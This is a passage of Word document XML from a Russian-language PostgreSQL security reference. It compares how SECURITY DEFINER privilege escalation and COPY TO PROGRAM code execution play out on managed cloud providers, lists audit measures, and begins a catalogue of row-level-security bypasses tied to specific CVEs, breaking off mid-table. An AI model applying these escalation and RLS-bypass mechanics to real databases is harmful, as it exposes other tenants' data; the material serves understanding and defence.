    <w:p w14:paraId="2B57EB82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все пять подразделов 3.16 — application/database-developer-уровень, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не зависят от cloud-provider</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2B44A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: одинаковое поведение. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (RDS-аналог superuser) может быть owner-ом SD-функций → 3.16.5 эскалирует до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что в RDS = full DB-control (но НЕ хост-OS — RDS изолирует filesystem от user-code; COPY TO PROGRAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>заблокирован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на managed RDS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB6177" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: то же; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничен от COPY TO PROGRAM. 3.16.5 RCE-vector урезан до DB-level, но privilege escalation внутри DB полная.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6B8E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PostgreSQL exposed через PostgREST; функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> массово используются для RLS-bypass паттернов (см. 3.17.5). Identifier-injection в Supabase-функциях = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>direct RCE within DB context</w:t>
      </w:r>
      <w:r>
        <w:t>. COPY TO PROGRAM аналогично заблокирован у supabase_admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357FF88B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: то же; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>azure_pg_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет ограничения на OS-level операции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096EADB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key provider-difference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: COPY TO PROGRAM и file-system extension (3.6.3/3.6.4) обычно отключены на managed provider даже под их «superuser»-equivalent роли. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>снижает 3.16.5 RCE-severity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на managed installations: вместо OS-RCE атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DB-superuser-equivalent</w:t>
      </w:r>
      <w:r>
        <w:t>, что всё равно открывает всё application-data, но не позволяет hyperscale-побег на host. Self-hosted PostgreSQL под обычным superuser — полная OS-RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609ED76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для defence-in-depth на managed providers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7AE5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS Performance Insights / Cloud SQL Insights</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — runtime-monitoring необычных DDL от non-DBA caller-ов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54193892" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pgAudit extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (доступна на всех major providers) — детальный log SECURITY DEFINER calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C0C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через scheduled task — статический check регулярных функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B9E47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13BDB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS (Row Level Security)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — механизм PostgreSQL для фильтрации строк на уровне таблицы по политикам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE t ENABLE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на таблицу автоматически фильтруется по политикам, привязанным к current_user. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>многотенантный изолятор данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный паттерн для SaaS, где разные tenant-ы делят одну таблицу с фильтрацией по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id = current_setting('app.tenant_id')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или подобному.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6210F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.17 покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обходы RLS через injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — шесть механик, каждая из которых даёт атакующему чтение/запись чужих строк, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обходя CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:t>. Четыре из них якорятся на конкретные CVE (R9 / R11 / R8 / R26), две — на documented PostgreSQL behavior без CVE (3.17.0 обзор, 3.17.5 SECURITY DEFINER pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69319464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Базовая модель RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E16B72A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Стандартный multi-tenant setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DA33F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.orders ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC6B52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE14E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D50C9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485167C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Per-request приложение делает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760641F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET app.tenant_id = '42';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D54F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM app.orders;  -- автоматически WHERE tenant_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255105B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY ... USING (expr)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фильтр чтения (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY ... WITH CHECK (expr)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фильтр записи (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> применяется даже к owner таблицы (по умолчанию RLS bypass для owner и superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3054CE44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Граница RLS в design</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079D48E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   RLS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>per-statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтрация: policy вычисляется для каждой row при scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC1ADD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   RLS привязан к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>-target).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF4A81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   RLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypass-нут</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для superuser и owner (без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA15DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   RLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>применяется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с WITH CHECK), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не применялся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к MERGE в PG 15.0–15.3 (R11/CVE-2023-39418).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785F225" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Шесть подразделов 3.17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8"/>
        <w:gridCol w:w="1885"/>
        <w:gridCol w:w="1867"/>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="1869"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="2E34B404" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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8A718A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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D69CD1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Вектор</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EEE6A1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</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B69A430" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Механика</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872"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ECCB47C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Затронутые версии PG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="78DDD0C6"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EAD56B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.1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0A4D26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Subquery / CTE + plan-cache</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3E9E7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10976</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R9)</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533300" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RLS-фильтр кэшируется в plan под одной ролью, исполняется под другой</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D837B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="35C0F176"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9F3AB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.2</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9C187B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MERGE не применяет UPDATE/SELECT policy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6401B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-39418</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R11)</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2E448" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Через MERGE INSERT обходится UPDATE-policy</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1C8256" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
